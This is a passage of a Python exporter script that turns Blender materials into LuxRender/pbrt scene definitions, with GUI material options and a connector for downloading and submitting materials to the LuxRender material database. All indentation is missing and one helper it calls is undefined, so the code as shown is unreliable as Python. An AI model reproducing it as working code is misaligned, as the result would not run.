vols = ["homogeneous", "exponential"]
vollink = luxOption("type", voltype, vols, "type", "", gui)
if voltype.get() == "homogeneous":
link = "Volume \"homogeneous\""
if voltype.get() == "exponential":
link = "Volume \"exponential\""
if gui: gui.newline("absorption:", 0, level+1)
link += luxRGB("sigma_a", luxProp(mat, kn+"vol.sig_a", "1.0 1.0 1.0"), 1.0, "sigma_a", "The absorption cross section", gui)
if gui: gui.newline("scattering:", 0, level+1)
link += luxRGB("sigma_s", luxProp(mat, kn+"vol.sig_b", "0.0 0.0 0.0"), 1.0, "sigma_s", "The scattering cross section", gui)
if gui: gui.newline("emission:", 0, level+1)
link += luxRGB("Le", luxProp(mat, kn+"vol.le", "0.0 0.0 0.0"), 1.0, "Le", "The volume's emission spectrum", gui)
if gui: gui.newline("assymetry:", 0, level+1)
link += luxFloat("g", luxProp(mat, kn+"vol.g", 0.0), 0.0, 100.0, "g", "The phase function asymmetry parameter", gui)
if voltype.get() == "exponential":
if gui: gui.newline("form:", 0, level+1)
link += luxFloat("a", luxProp(mat, kn+"vol.a", 1.0), 0.0, 100.0, "a/scale", "exponential::a parameter in the ae^{-bh} formula", gui)
link += luxFloat("b", luxProp(mat, kn+"vol.b", 2.0), 0.0, 100.0, "b/falloff", "exponential::b parameter in the ae^{-bh} formula", gui)
if gui: gui.newline("updir:", 0, level+1)
link += luxVector("updir", luxProp(mat, kn+"vol.updir", "0 0 1"), -1.0, 1.0, "updir", "Up direction vector", gui, 2.0)
link += str_opt
has_bump_options = 0
has_object_options = 0
has_emission_options = 0
return (str, link)
if mattype.get() == "glass":
(str,link) = c((str,link), luxSpectrumTexture("Kr", keyname, "1.0 1.0 1.0", 1.0, "reflection", "", mat, gui, level+1))
(str,link) = c((str,link), luxSpectrumTexture("Kt", keyname, "1.0 1.0 1.0", 1.0, "transmission", "", mat, gui, level+1))
(str,link) = c((str,link), luxIORFloatTexture("index", keyname, 1.5, 1.0, 6.0, "IOR", "", mat, gui, level+1))
has_bump_options = 1
has_object_options = 1
has_emission_options = 1
has_compositing_options = 1
if mattype.get() == "matte":
orennayar = luxProp(mat, keyname+".orennayar", "false")
(str,link) = c((str,link), luxSpectrumTexture("Kd", keyname, "1.0 1.0 1.0", 1.0, "diffuse", "", mat, gui, level+1))
luxCollapse("orennayar", orennayar, "Oren-Nayar", "Enable Oren-Nayar BRDF", gui, 2.0)
if orennayar.get() == "true":
(str,link) = c((str,link), luxFloatTexture("sigma", keyname, 0.0, 0.0, 100.0, "sigma", "sigma value for Oren-Nayar BRDF", mat, gui, level+1))
has_bump_options = 1
has_object_options = 1
has_emission_options = 1
has_compositing_options = 1
# if mattype.get() == "translucent":
# orennayar = luxProp(mat, keyname+".orennayar", "false")
# (str,link) = c((str,link), luxSpectrumTexture("Kr", keyname, "1.0 1.0 1.0", 1.0, "reflection", "", mat, gui, level+1))
# (str,link) = c((str,link), luxSpectrumTexture("Kt", keyname, "1.0 1.0 1.0", 1.0, "transmission", "", mat, gui, level+1))
# luxCollapse("orennayar", orennayar, "Oren-Nayar", "Enable Oren-Nayar BRDF", gui, 2.0)
# if orennayar.get() == "true":
# (str,link) = c((str,link), luxFloatTexture("sigma", keyname, 0.0, 0.0, 100.0, "sigma", "", mat, gui, level+1))
# has_bump_options = 1
# has_object_options = 1
# has_emission_options = 1
# has_compositing_options = 1
if mattype.get() == "metal":
if gui: gui.newline("name:", 0, level+1)
metalname = luxProp(mat, kn+"metal.name", "")
metals = ["Ag", "Al", "Au", "MgO"]
if not(metalname.get() in metals):
metals.append(metalname.get())
metallink = luxOption("name", metalname, metals, "name", "", gui, 1.88)
if gui: Draw.Button("...", evtLuxGui, gui.x, gui.y-gui.h, gui.h, gui.h, "click to select a spd file",lambda e,v:Window.FileSelector(lambda s:metalname.set(s), "Select spd file"))
link += luxstr(metallink)
anisotropic = luxProp(mat, kn+"metal.anisotropic", "false")
if gui:
gui.newline("")
Draw.Toggle("A", evtLuxGui, gui.x-gui.h, gui.y-gui.h, gui.h, gui.h, anisotropic.get()=="true", "anisotropic roughness", lambda e,v:anisotropic.set(["false","true"][bool(v)]))
if True: # anisotropic.get()=="true":
(str,link) = c((str,link), luxExponentTexture("roughness", keyname, 0.002, 0.0, 1.0, "u-exponent", "", mat, gui, level+1))
else:
(s, l) = luxExponentTexture("uroughness", keyname, 0.002, 0.0, 1.0, "exponent", "", mat, gui, level+1)
(str,link) = c((str,link), (s, l))
link += l.replace("uroughness", "vroughness", 1)
has_bump_options = 1
has_object_options = 1
has_emission_options = 1
has_compositing_options = 1
if mattype.get() == "mirror":
(str,link) = c((str,link), luxSpectrumTexture("Kr", keyname, "1.0 1.0 1.0", 1.0, "reflection", "", mat, gui, level+1))
has_bump_options = 1
has_object_options = 1
has_emission_options = 1
has_compositing_options = 1
if mattype.get() == "subsurface":
(str,link) = c((str,link), luxSpectrumTexture("sigma_a", keyname, ".0011 .0024 .014", 100.0, "absorption coefficient", "", mat, gui, level+1))
(str,link) = c((str,link), luxSpectrumTexture("sigma_prime_s", keyname, "2.55 3.21 3.77", 100.0, "scattering coefficient", "", mat, gui, level+1))
(str,link) = c((str,link), luxIORFloatTexture("index", keyname, 1.5, 1.0, 6.0, "IOR", "", mat, gui, level+1))
has_bump_options = 1
has_object_options = 1
has_emission_options = 1
has_compositing_options = 1
if mattype.get() == "kdsubsurface":
(str,link) = c((str,link), luxSpectrumTexture("Kd", keyname, ".5 .5 .5", 1.0, "diffuse coefficient", "", mat, gui, level+1))
(str,link) = c((str,link), luxFloatTexture("mean free path", keyname, 1.0, 0.01, 100.0, "mean free path", "mean free path", mat, gui, level+1))
(str,link) = c((str,link), luxIORFloatTexture("index", keyname, 1.5, 1.0, 6.0, "IOR", "", mat, gui, level+1))
has_bump_options = 1
has_object_options = 1
has_emission_options = 1
has_compositing_options = 1
if mattype.get() == "uber":
(str,link) = c((str,link), luxSpectrumTexture("Kd", keyname, "1.0 1.0 1.0", 1.0, "diffuse", "", mat, gui, level+1))
(str,link) = c((str,link), luxSpectrumTexture("Ks", keyname, "1.0 1.0 1.0", 1.0, "glossy", "", mat, gui, level+1))
(str,link) = c((str,link), luxSpectrumTexture("Kr", keyname, "0.0 0.0 0.0", 1.0, "specular", "", mat, gui, level+1))
if gui: gui.newline("")
(str,link) = c((str,link), luxExponentTexture("roughness", keyname, 0.002, 0.0, 1.0, "roughness", "", mat, gui, level+1))
has_bump_options = 1
has_object_options = 1
has_emission_options = 1
has_compositing_options = 1
if mattype.get() == 'null':
has_emission_options = 1
# Bump mapping options (common)
if (has_bump_options == 1):
usebump = luxProp(mat, keyname+".usebump", "false")
luxCollapse("usebump", usebump, "Bump Map", "Enable Bump Mapping options", gui, 2.0)
if usebump.get() == "true":
(str,link) = c((str,link), luxFloatTexture("bumpmap", keyname, 0.0, -1.0, 1.0, "bumpmap", "bumpmap scale in meters - i.e. 0.01 = 1 cm", mat, gui, level+1))
# emission options (common)
if (level == 0):
if (has_emission_options == 1):
if gui: gui.newline("", 2, level, None, [0.6,0.6,0.4])
useemission = luxProp(mat, "emission", "false")
luxCollapse("useemission", useemission, "Emission", "Enable emission options", gui, 2.0)
if useemission.get() == "true":
# emission GUI is here but lux export will be done later
luxLight("", "", mat, gui, level)
else: luxProp(mat, "emission", "false").set("false") # prevent from exporting later
# Compositing options (common)
# Note - currently only display options when using distributedpath integrator
integratortype = luxProp(Scene.GetCurrent(), "sintegrator.type", "bidirectional")
if False: # (integratortype.get() == "distributedpath" and level == 0):
if (has_compositing_options == 1):
if gui: gui.newline("", 2, level, None, [0.4,0.4,0.6])
usecompo = luxProp(mat, "compo", "false")
luxCollapse("compo", usecompo, "Compositing", "Enable Compositing options", gui, 2.0)
if usecompo.get() == "true":
if gui: gui.newline("", 2, level, None, [0.35,0.35,0.55])
usecompoviz = luxProp(mat, "compo_viz", "false")
luxCollapse("compo_viz", usecompoviz, "Visibility", "Enable Visibility Compositing options", gui, 2.0)
if usecompoviz.get() == "true":
if gui: gui.newline("View", 2, level, None, [0.35,0.35,0.55])
compovizmat = luxProp(mat, "compo_viz_mat", "true")
link += luxBool("compo_visible_material", compovizmat, "Material", "Enable View Visibility of Material", gui, 1.0)
compovizemi = luxProp(mat, "compo_viz_emi", "true")
link += luxBool("compo_visible_emission", compovizemi, "Emission", "Enable View Visibility of Emission", gui, 1.0)
if gui: gui.newline("Indirect", 2, level, None, [0.35,0.35,0.55])
compovizmati = luxProp(mat, "compo_viz_mati", "true")
link += luxBool("compo_visible_indirect_material", compovizmati, "Material", "Enable InDirect Visibility of Material", gui, 1.0)
compovizemii = luxProp(mat, "compo_viz_emii", "true")
link += luxBool("compo_visible_indirect_emission", compovizemii, "Emission", "Enable InDirect Visibility of Emission", gui, 1.0)
if gui: gui.newline("", 2, level, None, [0.4,0.4,0.6])
overridealpha = luxProp(mat, "compo_o_alpha", "false")
link += luxCollapse("compo_override_alpha", overridealpha, "Override Alpha", "Enable Manual control of alpha value", gui, 2.0)
if overridealpha.get() == "true":
if gui: gui.newline("Alpha", 2, level, None, [0.4,0.4,0.6])
link += luxFloat("compo_override_alpha_value", luxProp(mat, "compo_o_alpha_v", 0.0), 0.0, 1.0, "Alpha", "Alpha Value", gui, 2.0, 1)
usecolorkey = luxProp(mat, "compo_usekey", "false")
if gui: gui.newline("", 2, level, None, [0.35,0.35,0.55])
link += luxCollapse("compo_use_key", usecolorkey, "Chroma Key", "Enable Chroma Object key", gui, 2.0)
if usecolorkey.get() == "true":
if gui: gui.newline("Key", 2, level, None, [0.35,0.35,0.55])
link += luxRGB("compo_key_color", luxProp(mat, "compo_key_color", "0.0 0.0 1.0"), 1.0, "key", "", gui, 2.0)
# transformation options (common)
if (level == 0) and mattype.get() not in ['portal', 'null']:
if gui: gui.newline("", 2, level, None, [0.6,0.6,0.4])
usetransformation = luxProp(mat, "transformation", "false")
luxCollapse("usetransformation", usetransformation, "Texture Transformation", "Enable transformation option", gui, 2.0)
if usetransformation.get() == "true":
scale = luxProp(mat, "3dscale", 1.0)
rotate = luxProp(mat, "3drotate", "0 0 0")
translate = luxProp(mat, "3dtranslate", "0 0 0")
if gui:
gui.newline("scale:", -2, level, icon_map3dparam)
luxVectorUniform("scale", scale, 0.001, 1000.0, "scale", "scale-vector", gui, 2.0)
gui.newline("rot:", -2, level, icon_map3dparam)
luxVector("rotate", rotate, -360.0, 360.0, "rotate", "rotate-vector", gui, 2.0)
gui.newline("move:", -2, level, icon_map3dparam)
luxVector("translate", translate, -1000.0, 1000.0, "move", "translate-vector", gui, 2.0)
str = ("TransformBegin\n\tScale %f %f %f\n"%( 1.0/scale.getVector()[0],1.0/scale.getVector()[1],1.0/scale.getVector()[2] ))+("\tRotate %f 1 0 0\n\tRotate %f 0 1 0\n\tRotate %f 0 0 1\n"%rotate.getVector())+("\tTranslate %f %f %f\n"%translate.getVector()) + str + "TransformEnd\n"
# Object options (common)
if (level == 0) and (has_object_options == 1):
if gui: gui.newline("Mesh:", 2, level, icon, [0.6,0.6,0.4])
usesubdiv = luxProp(mat, "subdiv", "false")
luxBool("usesubdiv", usesubdiv, "Subdivision", "Enable Loop Subdivision options", gui, 1.0)
# usedisp = luxProp(mat, "dispmap", "false")
# luxBool("usedisp", usedisp, "Displacement Map", "Enable Displacement mapping options", gui, 1.0)
if usesubdiv.get() == "true": # or usedisp.get() == "true":
luxInt("sublevels", luxProp(mat, "sublevels", 2), 0, 12, "sublevels", "The number of levels of object subdivision", gui, 2.0)
# sharpbound = luxProp(mat, "sharpbound", "false")
# luxBool("sharpbound", sharpbound, "Sharpen Bounds", "Sharpen boundaries during subdivision", gui, 1.0)
# nsmooth = luxProp(mat, "nsmooth", "true")
# luxBool("nsmooth", nsmooth, "Smooth", "Smooth faces during subdivision", gui, 1.0)
# if usedisp.get() == "true":
# (str,ll) = c((str,link), luxDispFloatTexture("dispmap", keyname, 0.1, -10, 10.0, "dispmap", "Displacement Mapping amount", mat, gui, level+1))
# luxFloat("sdoffset", luxProp(mat, "sdoffset", 0.0), 0.0, 1.0, "Offset", "Offset for displacement map", gui, 2.0)
# usesubdiv.set("true")
if mattype.get() == "light":
return (str, link)
str += "MakeNamedMaterial \"%s\"%s\n"%(matname, link)
return (str, " \"string %s\" [\"%s\"]"%(luxname, matname))
def luxMaterial(mat, gui=None):
str = ""
if mat:
if luxProp(mat, "type", "").get()=="": # lux material not defined yet
print("Blender material \"%s\" has no lux material definition, converting..."%(mat.getName()))
try:
convertMaterial(mat) # try converting the blender material to a lux material
except: pass
(str, link) = luxMaterialBlock("", "", "", mat, gui, 0)
if luxProp(mat, "type", "matte").get() != "light":
link = "NamedMaterial \"%s\""%(mat.getName())
# export emission options (no gui)
useemission = luxProp(mat, "emission", "false")
if useemission.get() == "true":
# lightgroup = luxProp(mat, "light.lightgroup", "default")
# if luxProp(Scene.GetCurrent(), "nolg", "false").get()!="true":
# link += "\n\tLightGroup \"%s\"\n"%lightgroup.get()
(estr, elink) = luxLight("", "", mat, None, 0)
str += estr
link += "\n\tAreaLightSource \"area\" "+elink
luxProp(mat, "link", "").set("".join(link))
return str
def luxVolume(mat, gui=None):
str = ""
if mat:
(str, link) = luxMaterialBlock("", "", "", mat, gui, 0)
luxProp(mat, "link", "").set("".join(link))
return str
runRenderAfterExport = None
def CBluxExport(default, run):
global runRenderAfterExport
runRenderAfterExport = run
if default:
datadir = luxProp(Scene.GetCurrent(), "datadir", "").get()
if datadir=="": datadir = Blender.Get("datadir")
import os.path
if not os.path.exists(datadir):
Draw.PupMenu("ERROR: output directory does not exist!")
if LuxIsGUI:
Draw.Redraw()
return
filename = datadir + os.sep + "default.pbrt"
save_still(filename)
else:
Window.FileSelector(save_still, "Export", sys.makename(Blender.Get("filename"), ".pbrt"))
def CBluxAnimExport(default, run, fileselect=True):
if default:
datadir = luxProp(Scene.GetCurrent(), "datadir", "").get()
if datadir=="": datadir = Blender.Get("datadir")
import os.path
if not os.path.exists(datadir):
Draw.PupMenu("ERROR: output directory does not exist!")
if LuxIsGUI:
Draw.Redraw()
return
filename = datadir + os.sep + "default.pbrt"
save_anim(filename)
else:
if fileselect:
Window.FileSelector(save_anim, "Export", sys.makename(Blender.Get("filename"), ".pbrt"))
else:
datadir = luxProp(Scene.GetCurrent(), "datadir", "").get()
if datadir=="": datadir = Blender.Get("datadir")
filename = sys.makename(Blender.Get("filename") , ".pbrt")
save_anim(filename)
# convert a Blender material to lux material
def convertMaterial(mat):
def dot(str):
if str != "": return str+"."
return str
def ddot(str):
if str != "": return str+":"
return str
def mapConstDict(value, constant_dict, lux_dict, default=None):
for k,v in constant_dict.items():
if (v == value) and (lux_dict.has_key(k)):
return lux_dict[k]
return default
def convertMapping(name, tex):
if tex.texco == Texture.TexCo["UV"]:
luxProp(mat, dot(name)+"mapping","").set("uv")
luxProp(mat, dot(name)+"uscale", 1.0).set(tex.size[0])
luxProp(mat, dot(name)+"vscale", 1.0).set(-tex.size[1])
luxProp(mat, dot(name)+"udelta", 0.0).set(tex.ofs[0]+0.5*(1.0-tex.size[0]))
luxProp(mat, dot(name)+"vdelta", 0.0).set(-tex.ofs[1]-0.5*(1.0-tex.size[1]))
if tex.mapping != Texture.Mappings["FLAT"]:
print("Material Conversion Warning: for UV-texture-input only FLAT mapping is supported\n")
else:
if tex.mapping == Texture.Mappings["FLAT"]:
luxProp(mat, dot(name)+"mapping","").set("planar") # make planar-mapping convert correctly from blender(WYSIWYG)- jens
luxProp(mat, dot(name)+"v1", "1.0 1.0 1.0").setVector((0.5*tex.size[0], 0.0, 0.0))
luxProp(mat, dot(name)+"v2", "0.0 0.0 0.0").setVector((0.0, -0.5*tex.size[1], -0.0))
luxProp(mat, dot(name)+"udelta", 0.0).set(tex.ofs[0]+0.5)
luxProp(mat, dot(name)+"vdelta", 0.0).set(-tex.ofs[1]-0.5)
elif tex.mapping == Texture.Mappings["TUBE"]:
luxProp(mat, dot(name)+"mapping","").set("cylindrical")
elif tex.mapping == Texture.Mappings["SPHERE"]:
luxProp(mat, dot(name)+"mapping","").set("spherical")
else: luxProp(mat, dot(name)+"mapping","").set("planar")
luxProp(mat, dot(name)+"3dscale", "1.0 1.0 1.0").setVector((1.0/tex.size[0], 1.0/tex.size[1], 1.0/tex.size[2]))
luxProp(mat, dot(name)+"3dtranslate", "0.0 0.0 0.0").setVector((-tex.ofs[0], -tex.ofs[1], -tex.ofs[2]))
def convertColorband(colorband):
# colorbands are not supported in lux - so lets extract a average low-side and high-side color
cb = [colorband[0]] + colorband[:] + [colorband[-1]]
cb[0][4], cb[-1][4] = 0.0, 1.0
low, high = [0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0]
for i in range(1, len(cb)):
for c in range(4):
low[c] += (cb[i-1][c]*(1.0-cb[i-1][4]) + cb[i][c]*(1.0-cb[i][4])) * (cb[i][4]-cb[i-1][4])
high[c] += (cb[i-1][c]*cb[i-1][4] + cb[i][c]*cb[i][4]) * (cb[i][4]-cb[i-1][4])
return low, high
def createLuxTexture(name, tex):
texture = tex.tex
convertMapping(name, tex)
if (texture.type == Texture.Types["IMAGE"]) and (texture.image) and (texture.image.filename!=""):
luxProp(mat, dot(name)+"texture", "").set("imagemap")
luxProp(mat, dot(name)+"filename", "").set(texture.image.filename)
luxProp(mat, dot(name)+"wrap", "").set(mapConstDict(texture.extend, Texture.ExtendModes, {"REPEAT":"repeat", "EXTEND":"clamp", "CLIP":"black"}, ""))
else:
print "WARNING: Unable to convert texture type %s" % dot(name)
def convertTextures(basename, texs, type="float", channel="col", val=1.0):
tex = texs.pop()
texture = tex.tex
isImagemap = (texture.type == Texture.Types["IMAGE"]) and (texture.image) and (texture.image.filename!="")
if channel == "col":
if texture.flags & Texture.Flags["COLORBAND"] > 0:
cbLow, cbHigh = convertColorband(texture.colorband)
val1, alpha1, val2, alpha2 = (cbLow[0],cbLow[1],cbLow[2]), cbLow[3]*tex.colfac, (cbHigh[0], cbHigh[1], cbHigh[2]), cbHigh[3]*tex.colfac
if tex.noRGB:
lum1, lum2 = (val1[0]+val1[1]+val1[2])/3.0, (val2[0]+val2[1]+val2[2])/3.0
val1, val2 = (tex.col[0]*lum1,tex.col[1]*lum1,tex.col[2]*lum1), (tex.col[0]*lum2,tex.col[1]*lum2,tex.col[2]*lum2)
elif isImagemap and not(tex.noRGB): val1, alpha1, val2, alpha2 = (0.0,0.0,0.0), tex.colfac, (1.0,1.0,1.0), tex.colfac
else: val1, alpha1, val2, alpha2 = tex.col, 0.0, tex.col, tex.colfac
elif channel == "nor": val1, alpha1, val2, alpha2 = tex.norfac * 0.01, 0.0, tex.norfac * 0.01, 1.0
else: val1, alpha1, val2, alpha2 = 1.0, 0.0, 1.0, tex.varfac
if (tex.neg)^((channel=="nor") and (tex.mtNor<0)): val1, alpha1, val2, alpha2 = val2, alpha2, val1, alpha1
luxProp(mat, dot(basename)+"textured", "").set("true")
name = basename
if (alpha1 < 1.0) or (alpha2 < 1.0): # texture with transparency
luxProp(mat, dot(basename)+"texture", "").set("mix")
if alpha1 == alpha2: # constant alpha
luxProp(mat, ddot(basename)+"amount.value", 1.0).set(alpha1)
else:
createLuxTexture(ddot(basename)+"amount", tex)
luxProp(mat, ddot(basename)+"amount:tex1.value", 1.0).set(alpha1)
luxProp(mat, ddot(basename)+"amount:tex2.value", 1.0).set(alpha2)
# transparent to next texture
name = ddot(basename)+"tex1"
if len(texs) > 0:
convertTextures(ddot(basename)+"tex1", texs, type, channel, val)
else:
if type=="float": luxProp(mat, ddot(basename)+"tex1.value", 1.0).set(val)
else: luxProp(mat, ddot(basename)+"tex1.value", "1.0 1.0 1.0").setRGB((val[0], val[1], val[2]))
name = ddot(basename)+"tex2"
if val1 == val2: # texture with different colors / value
if type == "col": luxProp(mat, dot(name)+"value", "1.0 1.0 1.0").setRGB(val1)
else: luxProp(mat, dot(name)+"value", 1.0).set(val1)
else:
createLuxTexture(name, tex)
if type == "col": luxProp(mat, ddot(name)+"tex1.value", "1.0 1.0 1.0").setRGB(val1)
else: luxProp(mat, ddot(name)+"tex1.value", 1.0).set(val1)
if type == "col": luxProp(mat, ddot(name)+"tex2.value", "1.0 1.0 1.0").setRGB(val2)
else: luxProp(mat, ddot(name)+"tex2.value", 1.0).set(val2)
def convertDiffuseTexture(name):
texs = []
for tex in mat.getTextures():
if tex and (tex.mapto & Texture.MapTo["COL"] > 0) and (tex.tex) and (tex.tex.type != Texture.Types["NONE"]): texs.append(tex)
if len(texs) > 0:
luxProp(mat, name, "").setRGB((mat.ref, mat.ref, mat.ref))
convertTextures(name, texs, "col", "col", (mat.R, mat.G, mat.B))
def convertSpecularTexture(name):
texs = []
for tex in mat.getTextures():
if tex and (tex.mapto & Texture.MapTo["CSP"] > 0) and (tex.tex) and (tex.tex.type != Texture.Types["NONE"]): texs.append(tex)
if len(texs) > 0:
luxProp(mat, name, "").setRGB((mat.ref*mat.spec, mat.ref*mat.spec, mat.ref*mat.spec))
convertTextures(name, texs, "col", "col", (mat.specR, mat.specG, mat.specB))
def convertMirrorTexture(name):
texs = []
for tex in mat.getTextures():
if tex and (tex.mapto & Texture.MapTo["CMIR"] > 0) and (tex.tex) and (tex.tex.type != Texture.Types["NONE"]): texs.append(tex)
if len(texs) > 0:
luxProp(mat, name, "").setRGB((mat.ref, mat.ref, mat.ref))
convertTextures(name, texs, "col", "col", (mat.mirR, mat.mirG, mat.mirB))
def convertBumpTexture(basename):
texs = []
for tex in mat.getTextures():
if tex and (tex.mapto & Texture.MapTo["NOR"] > 0) and (tex.tex) and (tex.tex.type != Texture.Types["NONE"]): texs.append(tex)
if len(texs) > 0:
name = basename+":bumpmap"
luxProp(mat, basename+".usebump", "").set("true")
luxProp(mat, dot(name)+"textured", "").set("true")
luxProp(mat, name, "").set(1.0)
convertTextures(name, texs, "float", "nor", 0.0)
def makeMatte(name):
luxProp(mat, dot(name)+"type", "").set("matte")
luxProp(mat, name+":Kd", "").setRGB((mat.R*mat.ref, mat.G*mat.ref, mat.B*mat.ref))
convertDiffuseTexture(name+":Kd")
convertBumpTexture(name)
def makeGlossy(name, roughness):
luxProp(mat, dot(name)+"type", "").set("glossy")
luxProp(mat, name+":Kd", "").setRGB((mat.R*mat.ref, mat.G*mat.ref, mat.B*mat.ref))
luxProp(mat, name+":Ks", "").setRGB((mat.specR*mat.spec*0.5, mat.specG*mat.spec*0.5, mat.specB*mat.spec*0.5))
luxProp(mat, name+":uroughness", 0.0).set(roughness)
luxProp(mat, name+":vroughness", 0.0).set(roughness)
convertDiffuseTexture(name+":Kd")
convertSpecularTexture(name+":Ks")
convertBumpTexture(name)
def makeMirror(name):
luxProp(mat, dot(name)+"type", "").set("mirror")
luxProp(mat, name+":Kr", "").setRGB((mat.mirR, mat.mirG, mat.mirB))
convertMirrorTexture(name+":Kr")
convertBumpTexture(name)
def makeGlass(name):
luxProp(mat, dot(name)+"type", "").set("glass")
luxProp(mat, name+":Kr", "").setRGB((0.0, 0.0, 0.0))
luxProp(mat, name+":Kt", "").setRGB((mat.R, mat.G, mat.B))
luxProp(mat, name+":index.iorusepreset", "").set("false")
luxProp(mat, name+":index", 0.0).set(mat.getIOR())
convertMirrorTexture(name+":Kr")
convertDiffuseTexture(name+":Kt")
convertBumpTexture(name)
print("convert Blender material \"%s\" to lux material"%(mat.name))
mat.properties['pbrtblend'] = {}
if mat.emit > 0.0001:
luxProp(mat, "type", "").set("light")
luxProp(mat, "light.l", "").setRGB((mat.R, mat.G, mat.B))
luxProp(mat, "light.gain", 1.0).set(mat.emit)
return
alpha = mat.alpha
if not(mat.mode & Material.Modes.RAYTRANSP): alpha = 1.0
alpha0name, alpha1name = "", ""
if (alpha > 0.0) and (alpha < 1.0):
luxProp(mat, "type", "").set("mix")
luxProp(mat, ":amount", 0.0).set(alpha)
alpha0name, alpha1name = "mat2", "mat1"
if alpha > 0.0:
mirror = mat.rayMirr
if not(mat.mode & Material.Modes.RAYMIRROR): mirror = 0.0
mirror0name, mirror1name = alpha1name, alpha1name
if (mirror > 0.0) and (mirror < 1.0):
luxProp(mat, dot(alpha1name)+"type", "").set("mix")
luxProp(mat, alpha1name+":amount", 0.0).set(1.0 - mirror)
mirror0name, mirror1name = ddot(alpha1name)+"mat1", ddot(alpha1name)+"mat2"
if mirror > 0.0:
if mat.glossMir < 1.0: makeGlossy(mirror1name, 1.0-mat.glossMir**2)
else: makeMirror(mirror1name)
if mirror < 1.0:
if mat.spec > 0.0: makeGlossy(mirror0name, 1.0/mat.hard)
else: makeMatte(mirror0name)
if alpha < 1.0:
if mat.glossTra < 1.0: makeRoughnessGlass(alpha0name, 1.0-mat.glossTra**2)
else: makeGlass(alpha0name)
def convertAllMaterials():
for mat in Material.Get(): convertMaterial(mat)
### Connect LRMDB ###
ConnectLrmdb = False
try:
import socket # try import of socket library
ConnectLrmdb = True
def downloadLRMDB(mat, id):
if id.isalnum():
DrawProgressBar(0.0,'Getting Material #'+id)
try:
HOST = 'www.luxrender.net'
GET = '/lrmdb/en/material/download/'+id
PORT = 80
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, PORT))
sock.send("GET %s HTTP/1.0\r\nHost: %s\r\n\r\n" % (GET, HOST))
data = sock.recv(1024)
str = ""
while len(data):
str += data
data = sock.recv(1024)
sock.close()
if str.split("\n", 1)[0].find("200") < 0:
print("ERROR: server error: %s"%(str.split("\n",1)[0]))
return None
str = (str.split("\r\n\r\n")[1]).strip()
if (str[0]=="{") and (str[-1]=="}"):
return str2MatTex(str)
print("ERROR: downloaded data is not a material or texture")
except:
print("ERROR: download failed")
DrawProgressBar(1.0,'')
else:
print("ERROR: material id is not valid")
return None
#===========================================================================
# COOKIETRANSPORT
#===========================================================================
#---------------------------------------------------------------------------
# IMPORTS
import cookielib, urllib2, xmlrpclib
#---------------------------------------------------------------------------
# pilfered from
# https://fedorahosted.org/python-bugzilla/browser/bugzilla.py?rev=e6f699f06e92b1e49b1b8d2c8fbe89d9425a4a9a
class CookieTransport(xmlrpclib.Transport):
'''
A subclass of xmlrpclib.Transport that supports cookies.
'''
cookiejar = None
scheme = 'http'
verbose = None
# Cribbed from xmlrpclib.Transport.send_user_agent
def send_cookies(self, connection, cookie_request):
'''
Send all the cookie data that we have received
'''
if self.cookiejar is None:
self.cookiejar = cookielib.CookieJar()
elif self.cookiejar:
# Let the cookiejar figure out what cookies are appropriate
self.cookiejar.add_cookie_header(cookie_request)
# Pull the cookie headers out of the request object...
cookielist = list()
for header, value in cookie_request.header_items():
if header.startswith('Cookie'):
cookielist.append([header, value])
# ...and put them over the connection
for header, value in cookielist:
connection.putheader(header, value)
# This is the same request() method from xmlrpclib.Transport,
# with a couple additions noted below
def request(self, host, handler, request_body, verbose=0):
'''
Handle the request
'''
host_connection = self.make_connection(host)
if verbose:
host_connection.set_debuglevel(1)
# ADDED: construct the URL and Request object for proper cookie handling
request_url = "%s://%s/" % (self.scheme, host)
cookie_request = urllib2.Request(request_url)
self.send_request(host_connection, handler, request_body)
self.send_host(host_connection, host)
# ADDED. creates cookiejar if None.
self.send_cookies(host_connection, cookie_request)
self.send_user_agent(host_connection)
self.send_content(host_connection, request_body)
errcode, errmsg, headers = host_connection.getreply()
# ADDED: parse headers and get cookies here
class CookieResponse:
'''
fake a response object that we can fill with the headers above
'''
def __init__(self, headers):
self.headers = headers
def info(self):
return self.headers
cookie_response = CookieResponse(headers)
# Okay, extract the cookies from the headers
self.cookiejar.extract_cookies(cookie_response, cookie_request)
# And write back any changes
# DH THIS DOESN'T WORK
# self.cookiejar.save(self.cookiejar.filename)
if errcode != 200:
raise xmlrpclib.ProtocolError(
host + handler,
errcode, errmsg,
headers
)
self.verbose = verbose
try:
sock = host_connection._conn.sock
except AttributeError:
sock = None
return self._parse_response(host_connection.getfile(), sock)
#===========================================================================
# LRMDB Integration
#===========================================================================
class lrmdb:
host = 'http://www.luxrender.net/lrmdb/ixr'
username = ""
password = ""
logged_in = False
SERVER = None
last_error_str = None
def last_error(self):
return self.last_error_str #'LRMDB Connector: %s' %
def login(self):
try:
result = self.SERVER.user.login(
self.username,
self.password
)
if not result:
raise
else:
self.logged_in = True
return True
except:
self.last_error_str = 'Login Failed'
self.logged_in = False
return False
def submit_object(self, mat, basekey, tex):
if not self.check_creds(): return False
try:
result = 'Unknown Error'
if tex:
name = Draw.PupStrInput('Name: ', '', 32)
else:
name = mat.name
result = self.SERVER.object.submit(
name,
MatTex2dict( getMatTex(mat, basekey, tex), tex )
)
if result is not True:
raise
else:
return True
except:
self.last_error_str = 'Submit failed: %s' % result
return False
def check_creds(self):
if self.SERVER is None:
try:
self.SERVER = xmlrpclib.ServerProxy(self.host, transport=CookieTransport())
except:
self.last_error_str = 'ServerProxy init failed'
return False
if not self.logged_in:
#if self.username is "":
self.request_username()
#if self.password is "":
self.request_password()
return self.login()
else:
return True
def request_username(self):
self.username = Draw.PupStrInput("Username:", self.username, 32)
def request_password(self):
self.password = Draw.PupStrInput("Password:", self.password, 32)
lrmdb_connector = lrmdb()
except: print("WARNING: LRMDB support not available")
### MatTex functions ###
### MatTex : is a dictionary of material or texture properties
def getMatTex(mat, basekey='', tex=False):
global usedproperties, usedpropertiesfilterobj
usedproperties = {}
usedpropertiesfilterobj = mat
luxMaterial(mat)
dict = {}
for k,v in usedproperties.items():
if k[:len(basekey)]==basekey:
if k[-9:] != '.textured':
name = k[len(basekey):]
if name == ".type": name = "type"
dict[name] = v
dict["__type__"] = ["material","texture"][bool(tex)]
return dict
def putMatTex(mat, dict, basekey='', tex=None):
if dict and (tex!=None) and (tex ^ (dict.has_key("__type__") and (dict["__type__"]=="texture"))):
print("ERROR: Can't apply %s as %s"%(["texture","material"][bool(tex)],["material","texture"][bool(tex)]))
